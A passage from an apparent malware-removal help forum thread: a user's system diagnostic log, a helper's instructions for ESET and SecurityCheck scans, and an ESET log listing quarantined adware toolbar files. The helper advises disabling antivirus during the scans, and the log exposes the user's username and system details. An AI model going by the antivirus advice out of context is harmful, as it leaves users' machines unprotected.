2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2013-11-04 10:17 - 2012-06-07 21:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2012-06-08 11:34 - 2012-06-08 11:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00344448 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWDebugDll_win32.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00434560 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWDebug.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00467328 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWUtils.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 32689536 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWExternLib.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00299392 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLib_win.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 06182784 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWData.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 07427456 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWApplication.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 13638016 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLib.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 02259840 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\KWMainLibData.4.1.0.99957.dll
2016-02-29 09:23 - 2016-02-29 09:23 - 00353664 _____ () C:\Users\levilaing\AppData\Roaming\Dashlane\4.1.0.99957\bin\Firefox_Extension\{442718d9-475e-452a-b3e1-fb1ee16b8e9f}\components\Kwift_DP.4.1.0.99957.dll
2014-10-28 11:22 - 2014-10-28 11:22 - 40622592 ____R () C:\Program Files (x86)\Fitbit Connect\libcef.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2016-03-08 16:56 - 00000056 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 localhost
::1 localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\levilaing\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\{9deef5e1-ccab-4b3d-bca1-455b50a6a967}.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run32: => "Price Finder"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeUpdater"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeWatcher"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "BCSSync"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "Power2GoExpress8"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "SearchProtection"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Restore Points =========================

09-02-2016 13:53:15 Windows Update
01-03-2016 13:01:54 Windows Update
01-03-2016 13:02:55 Windows Update
08-03-2016 16:48:57 Removed Bonjour
09-03-2016 17:44:29 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (03/09/2016 06:20:14 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll8

Error: (03/09/2016 05:44:46 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/09/2016 05:14:27 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program ns.exe version 13.0.2.6 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: e1c

Start Time: 01d17a55c29d78ee

Termination Time: 14

Application Path: C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe

Report Id: a616f939-e64c-11e5-bec4-a0b3cc48869f

Faulting package full name:

Faulting package-relative application ID:

Error: (03/08/2016 04:49:01 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

System errors:
=============
Error: (03/09/2016 08:35:57 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (03/09/2016 08:31:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_66ab6 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 08:31:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_66ab6 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 08:31:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_66ab6 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 08:31:42 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_66ab6 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 08:31:42 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/09/2016 08:21:00 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/09/2016 07:37:13 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (03/09/2016 07:31:26 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The EraserSvc11511 service failed to start due to the following error:
%%2

Error: (03/09/2016 07:31:16 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The EgisTec Service service failed to start due to the following error:
%%1053

CodeIntegrity:
===================================
Date: 2016-03-09 19:26:18.595
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-03-01 13:39:04.692
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-15 11:48:03.432
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-09 21:20:12.135
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-28 15:09:07.207
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-19 20:04:09.326
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-12 14:52:54.813
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-06 07:51:33.186
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-12-31 10:57:24.742
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-12-28 11:47:23.759
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core™ i5-3210M CPU @ 2.50GHz
Percentage of memory in use: 37%
Total physical RAM: 6033.27 MB
Available physical RAM: 3758.48 MB
Total Virtual: 6993.27 MB
Available Virtual: 4693.2 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:669.53 GB) (Free:596.4 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:27.14 GB) (Free:3.16 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 5CA0CBD1)

Partition: GPT.

==================== End of Addition.txt ============================

#14
pystryker

Posted 09 March 2016 - 08:58 PM

Trusted Helper

Malware Removal
3,912 posts

I just did it again just to be sure.

I don't see the file in the new log, so MBAM did the job.

Let's run a sweep for remnants and any out of date programs on the machine. How is it running?

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.

Step 1: ESET Online Virus Scan

Please note: You can use Internet Explorer or Firefox for this step.

If you use Firefox, you will be prompted to download esetsmartinstaller_enu.exe. Please do so, then double click it to install it.

Please click on this link and then click the ESET Online Scanner bar ---->

Select the option YES, I accept the Terms of Use then click on Start
When prompted allow the Add-On/Active X to install.
Make sure that the option Remove found threats is NOT checked.
Make sure that the option Scan archives is checked.
Now click on Advanced Settings and select the following:
Scan for potentially unwanted applications
Scan for potentially unsafe applications
Enable Anti-Stealth Technology
Now click on Start
The virus signature database will begin to download. Be patient this make take some time depending on the speed of your Internet Connection.
When completed the Online Scan will begin automatically. The scan may take several hours.
Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
Now click on Finish
Use notepad to open the logfile located at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
Copy and paste that log as a reply to this topic.

Step 2: SecurityCheck Scan

Download Security Check

by screen317 from here or here.

Save it to your Desktop.
Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
NOTE: If SecurityCheck aborts and you get the following message: UNSUPPORTED OPERATING SYSTEM! ABORTED! try rebooting the system and then run SecurityCheck again.
A Notepad document should open automatically called checkup.txt; please post the contents of that document.

Things I need to see in your next post:

ESET Scan Log
SecurityCheck Log

#15
LLL31

Posted 10 March 2016 - 12:04 PM

Member

Topic Starter
Member
15 posts

My computer seems to be running much better now! Here is the ESET log. I am working on the security check log

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# end=init
# utc_time=2016-03-10 03:06:21
# local_time=2016-03-09 09:06:21 (-0600, Central Standard Time)
# country="United States"
# osver=6.2.9200 NT
Update Init
Update Download
Update Finalize
Updated modules version: 28506
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# end=updated
# utc_time=2016-03-10 03:11:16
# local_time=2016-03-09 09:11:16 (-0600, Central Standard Time)
# country="United States"
# osver=6.2.9200 NT
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=907c7887564b7f4e9369d7832e800278
# engine=28506
# end=stopped
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2016-03-10 01:19:26
# local_time=2016-03-10 07:19:26 (-0600, Central Standard Time)
# country="United States"
# lang=1033
# osver=6.2.9200 NT
# compatibility_mode_1='Norton Security'
# compatibility_mode=3604 16777213 100 97 1623627 49396892 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 7054036 10504909 0 0
# scanned=127771
# found=50
# cleaned=0
# scan_time=36489
sh=1A561004F779C2C90442B67289372563F7D3030B ft=1 fh=0f13f5e05ae936b5 vn="Win32/Toolbar.MyWebSearch.T potentially unwanted application" ac=I fn="C:\FRST\Quarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\NP5zStub.dll.xBAD"
sh=99DF98DFEF4B483889FA88162D20EE46340A5DBE ft=1 fh=e6e2c196b2ffcb6f vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zauxstb.dll.vir"
sh=0FF3588ECB69D2B18C6FAEC012672CA2F60314F6 ft=1 fh=731190b7425307d6 vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbprtct.dll.vir"
sh=0F78FE90AF015B0A511EDE007BD1791A341E891E ft=1 fh=d4fd6df3b7cf992d vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbrmon.exe.vir"
sh=12FF3195BDACA5482034AAC3C3E132D5ADA421A9 ft=1 fh=982f80d197512813 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zbrstub.dll.vir"
sh=BAEFCB03679575349E01668C4F0938643BAAA022 ft=1 fh=45ba6b521529362d vn="a variant of Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdatact.dll.vir"
sh=0C88EFCFA1C77D597111125A6C031CEB47B18BA7 ft=1 fh=b856def4c7346ea3 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdlghk.dll.vir"
sh=8090E240F528004402B29C11E5072BED79D95384 ft=1 fh=73e118282d8d3c4a vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zdyn.dll.vir"
sh=2CA2EA6CF1AD1FE87C25D4AB6B1C7729E48C6390 ft=1 fh=a34a8b9082c46c86 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zfeedmg.dll.vir"
sh=9788294F2B8AB28DBAE4C73BB61A6B1200BDD89D ft=1 fh=af8ed8fd644fe8ac vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhighin.exe.vir"
sh=9D54BAF23397E5F1444BC6471052AD234B76FBD3 ft=1 fh=2ab58862c927227b vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhkstub.dll.vir"
sh=978867B422339E68971E56C49C66F14F2ACD745D ft=1 fh=dd289cd2c7a55037 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zhttpct.dll.vir"
sh=DC971C75FFCE77CC952FB6660A2603E09D62D4D9 ft=1 fh=ac2f97e786bfc982 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zidle.dll.vir"
sh=92AC05FFF3AD68271062A3DCB87E12EE6B816DDB ft=1 fh=acec1e59f99ab2fd vn="a variant of Win32/Toolbar.MyWebSearch.P potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zieovr.dll.vir"
sh=AFCAAC5845D81A407C63733E4A7D007167F96BE8 ft=1 fh=02b0c8de8c8e9f1e vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zimpipe.exe.vir"
sh=556C4FCA5D890F17B7B5040A601B42452A205E29 ft=1 fh=0f2a31b21601aeb5 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmedint.exe.vir"
sh=3EB4A6A25199E6339EC04F36189C71738DE63CE7 ft=1 fh=eafb3b5bfaf84345 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmlbtn.dll.vir"
sh=DFD07B722E317D1CDDAAB7D5B31BFAB57CC5E739 ft=1 fh=507b4871517a4ad4 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zmsg.dll.vir"
sh=CBF93E0F6FF8AE054C18BDBE477CBFAF9F467CF9 ft=1 fh=f7d96c65ea0021a5 vn="a variant of Win32/Toolbar.MyWebSearch potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zPlugin.dll.vir"
sh=77C8DC985373B1E5D9035ECB3A831C7DD1ABFD55 ft=1 fh=e1f880731de07609 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zradio.dll.vir"
sh=C5F26031D5E0C487BFF0D60AA44603135BF60395 ft=1 fh=a846ae5344ec78c3 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zregfft.dll.vir"
sh=A2F202F68FEF2A31E9FE3AE124A46B908349778C ft=1 fh=bf17c6b7704b10fd vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zreghk.dll.vir"
sh=65D604A070334183E5034CDEEC5838E46D705794 ft=1 fh=3d9a604351eb1640 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zregiet.dll.vir"
sh=72E48F7F37E208A52AD975EAECAB29FC50223C27 ft=1 fh=958a563919bf5cc2 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zscript.dll.vir"
sh=857980A7B7AB77FF8E34A090CCD76B8BA628E7E4 ft=1 fh=6c9ac10ea3ee1cdd vn="a variant of Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zskin.dll.vir"
sh=496310EE0816B49176E03226DB102FAE9AA452B4 ft=1 fh=ceffc168909c0690 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zsknlcr.dll.vir"
sh=F5946D49A70A64072739370E7BAD592FE4799EA1 ft=1 fh=5bc3efb780caf8fa vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zskplay.exe.vir"
sh=BE21D76E502D546B2D88093E13F07923EB59380B ft=1 fh=7424967c664ed914 vn="a variant of Win32/Toolbar.MyWebSearch.AC potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zSrcAs.dll.vir"
sh=8ACE75F6C2417666AD9D60837B72D78B394C3944 ft=1 fh=ae6d89138faf571c vn="Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zSrchMn.exe.vir"
sh=110033F4A78DCA521E8BA73F75747E4E3B6AE545 ft=1 fh=21686246ae128bdd vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\5zuabtn.dll.vir"
sh=630D5FC9ACC4932C87263895F554F8C3CB6D4B4A ft=1 fh=b81ce565a99a556c vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\AppIntegrator64.exe.vir"
sh=374E378A91209732B48C8416D1E9805E98FDCFA9 ft=1 fh=6da58ad1308c1c96 vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\AppIntegratorStub64.dll.vir"
sh=6902D246F8FC2457C9AE369B094292DE6EB454BC ft=1 fh=b1be847bff3fcf8f vn="a variant of Win32/Toolbar.MyWebSearch.W potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\CREXT.DLL.vir"
sh=FF9F058B12B6C4D9B6256304FA9078E391C7F32C ft=1 fh=6022d103b074fe9f vn="a variant of Win32/Toolbar.MyWebSearch.Z potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\CrExtP5z.exe.vir"
sh=244414D9D39E114E7989C3B35A5FF038508ECFC1 ft=1 fh=0cbd734d892ac7d4 vn="a variant of Win32/Toolbar.MyWebSearch.AI potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\DPNMNGR.DLL.vir"
sh=6FF50369661027A1CD5F5E465F78C78913FF84CC ft=1 fh=c941e5f2ec9d2835 vn="a variant of Win32/Toolbar.MyWebSearch.AI potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\EXEMANAGER.DLL.vir"
sh=3D7CD376DFDB97512A376E85FBB7F04344C051B6 ft=1 fh=e0ed2601e18686d8 vn="Win64/Toolbar.MyWebSearch.A potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\Hpg64.dll.vir"
sh=2F938D8C9A5D3C9C239793346D43193BA1CBFCD6 ft=1 fh=929bde520a5aa0d2 vn="a variant of Win32/Toolbar.MyWebSearch.AU potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8EXTEX.DLL.vir"
sh=B8944722E8D577E67925DD4A72D1D8E44C3BC6CA ft=1 fh=6f8a20cf4b11d7b0 vn="Win32/Toolbar.MyWebSearch.AA potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8EXTPEX.DLL.vir"
sh=2E85C71E79C5B2A65D8CCDD5B21AFE559102062F ft=1 fh=68336e5d9907ad1c vn="a variant of Win32/Toolbar.MyWebSearch.AC potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\T8TICKER.DLL.vir"
sh=D0787BEAE97CE99982E7F5000772831421FD48E4 ft=1 fh=b650850bda28ebe2 vn="a variant of Win32/Toolbar.MyWebSearch.AU potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5z\bar\1.bin\VERIFY.DLL.vir"
sh=499E228EDD239496AC4401619894F45BEB39CB25 ft=1 fh=11b6a11b071ec76e vn="Win32/Toolbar.MyWebSearch potentially unwanted application" ac=I fn="C:\Program Files (x86)\AdwCleaner\FileQuarantine\C\Program Files (x86)\CouponXplorer_5zEI\Installr\1.bin\5zEIPlug.dll.vir"
